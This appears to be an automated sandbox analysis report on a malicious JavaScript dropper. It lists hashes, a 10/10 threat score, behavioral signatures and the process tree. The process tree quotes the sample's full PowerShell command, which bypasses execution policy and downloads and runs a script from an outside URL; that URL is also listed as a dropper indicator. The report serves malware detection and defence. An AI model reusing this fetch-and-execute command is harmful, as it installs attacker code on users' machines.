Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
01-03-2024 16:28
Static task
static1
Behavioral task
behavioral1
Sample
I_190941909419094SH_19094.js
Resource
win7-20240221-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
I_190941909419094SH_19094.js
Resource
win10v2004-20240226-en
11 signatures
150 seconds
General
-
Target
I_190941909419094SH_19094.js
-
Size
53KB
-
MD5
e03e92ac8fb4660b37306d2e3054ff7b
-
SHA1
2e1d74fcceb08bac9f1498e99c5a2a3c30a93701
-
SHA256
c6a6520a8d9d4ada3c4c23ca97fe954be793f4eda9dc3b6e28d9588fa6051a98
-
SHA512
07d89001bff59317bd0121f37f77fde7a1ad0bb914e050f3212e7840cd75f6a2c1013b521322e3a5d1b73ae3218fc19fc455ea30140c1ee21c303df675b294b0
-
SSDEEP
1536:Dy9WbpDiixx/hEn/+4wSlbl4scxwBJvO4TIWBC:DDBR/unwS5l4scqtPTLM
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://hotelashrafee.com/rem.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2480 powershell.exe 4 2480 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2480 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2480 2868 wscript.exe 28 PID 2868 wrote to memory of 2480 2868 wscript.exe 28 PID 2868 wrote to memory of 2480 2868 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\I_190941909419094SH_19094.js1⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hotelashrafee.com/rem.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480
-